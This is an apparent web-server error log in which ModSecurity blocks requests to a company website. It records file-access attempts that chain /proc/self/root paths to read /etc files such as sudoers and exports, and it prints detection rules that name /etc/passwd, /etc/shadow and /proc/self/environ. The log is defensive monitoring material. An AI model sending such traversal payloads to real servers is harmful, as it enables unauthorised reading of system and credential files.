[Fri Mar 20 11:18:53.969125 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.241.31:46146] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1XTTJ3M9BSuKP7CAZRMgAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:19:00.873083 2026] [:error] [pid 11642:tid 140411725141760] [client 74.7.241.31:46256] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1XVLninkcc-iUj5AqIQgAAA4I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:19:02.381216 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.243.128:35168] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1XVhCii7xarUs8iHaVggAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:19:04.876308 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.243.128:45680] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1XWOoXxyEfFpUF8f-rfwAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:19:06.275210 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.243.128:45690] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1XWhCii7xarUs8iHaVgwAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:19:11.727449 2026] [:error] [pid 11167:tid 140411616036608] [client 57.141.18.119:38290] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1XX_HIg5MgXLBnicMhDQAAAc8"]
[Fri Mar 20 11:19:15.055938 2026] [:error] [pid 15826:tid 140411557287680] [client 57.141.18.92:38400] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/nervate/unordinately011012533289.phtml"] [unique_id "ab1XY-oXxyEfFpUF8f-rhAAAAVY"]
[Fri Mar 20 11:19:22.245853 2026] [:error] [pid 7235:tid 140411674785536] [client 74.7.228.61:41630] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1XafqxLDW4GITHUkQVVQAAAQg"]
[Fri Mar 20 11:19:22.250357 2026] [:error] [pid 11167:tid 140411733534464] [client 74.7.243.128:45700] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1XafHIg5MgXLBnicMhJgAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Fri Mar 20 11:19:29.803361 2026] [:error] [pid 9818:tid 140411674785536] [client 57.141.18.114:38836] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudoers"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1XcV1pVZ5mVmJwsFNaYQAAAEg"]
[Fri Mar 20 11:19:45.196119 2026] [:error] [pid 9818:tid 140411548894976] [client 57.141.18.98:39268] [client 57.141.18.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/exports"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1XgV1pVZ5mVmJwsFNaaAAAAFc"]
[Fri Mar 20 11:19:50.081445 2026] [:error] [pid 15826:tid 140411590858496] [client 57.141.18.51:39428] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1XhuoXxyEfFpUF8f-rkwAAAVI"]
[Fri Mar 20 11:19:56.636851 2026] [:error] [pid 10189:tid 140411590858496] [client 57.141.18.6:39614] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1XjDJ3M9BSuKP7CAZRTwAAAJI"]
[Fri Mar 20 11:20:18.771134 2026] [:error] [pid 15826:tid 140411699963648] [client 57.141.18.5:40166] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/bashrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1XouoXxyEfFpUF8f-rnAAAAUU"]
[Fri Mar 20 11:20:30.584882 2026] [:error] [pid 11167:tid 140411683178240] [client 57.141.18.30:40582] [client 57.141.18.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1XrvHIg5MgXLBnicMhXwAAAcc"]
[Fri Mar 20 11:20:30.820576 2026] [:error] [pid 26799:tid 140411716749056] [client 57.141.18.70:40648] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Xrta6ubjKNq_cu4YFgwAAA0M"]
[Fri Mar 20 11:20:47.710298 2026] [:error] [pid 9818:tid 140411632822016] [client 74.7.244.43:43190] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1Xv11pVZ5mVmJwsFNalAAAAE0"]
[Fri Mar 20 11:20:49.660842 2026] [:error] [pid 31215:tid 140411708356352] [client 57.141.18.103:41014] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1XwQF0L0L-SsrnPo6UAgAAAsQ"]
[Fri Mar 20 11:21:06.056724 2026] [:error] [pid 11167:tid 140411557287680] [client 57.141.18.23:41622] [client 57.141.18.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyncd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1X0vHIg5MgXLBnicMhbgAAAdY"]
[Fri Mar 20 11:21:10.260798 2026] [mime_magic:error] [pid 15826:tid 140411716749056] (70014)End of file found: [client 57.141.18.76:41818] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:21:18.412481 2026] [:error] [pid 11167:tid 140411540502272] [client 57.141.18.4:42074] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1X3vHIg5MgXLBnicMheAAAAdg"]
[Fri Mar 20 11:21:23.017919 2026] [:error] [pid 31215:tid 140411716749056] [client 74.7.241.31:53646] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1X4wF0L0L-SsrnPo6ULwAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:21:27.349197 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.243.128:44494] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1X5rninkcc-iUj5AqIzgAAA4k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:21:27.356609 2026] [:error] [pid 11167:tid 140411674785536] [client 57.141.18.58:42290] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/freetds.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1X5vHIg5MgXLBnicMhgQAAAcg"]
[Fri Mar 20 11:21:27.357959 2026] [:error] [pid 11167:tid 140411641214720] [client 57.141.18.47:42312] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1X5_HIg5MgXLBnicMhggAAAcw"]
[Fri Mar 20 11:21:35.208700 2026] [:error] [pid 7235:tid 140411699963648] [client 57.141.18.71:42442] [client 57.141.18.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1X7_qxLDW4GITHUkQV4AAAAQU"]
[Fri Mar 20 11:21:42.016338 2026] [:error] [pid 10189:tid 140411540502272] [client 57.141.18.92:42690] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1X9TJ3M9BSuKP7CAZRgwAAAJg"]
[Fri Mar 20 11:21:44.428711 2026] [:error] [pid 7235:tid 140411565680384] [client 57.141.18.77:42704] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1X-PqxLDW4GITHUkQV7gAAARU"]
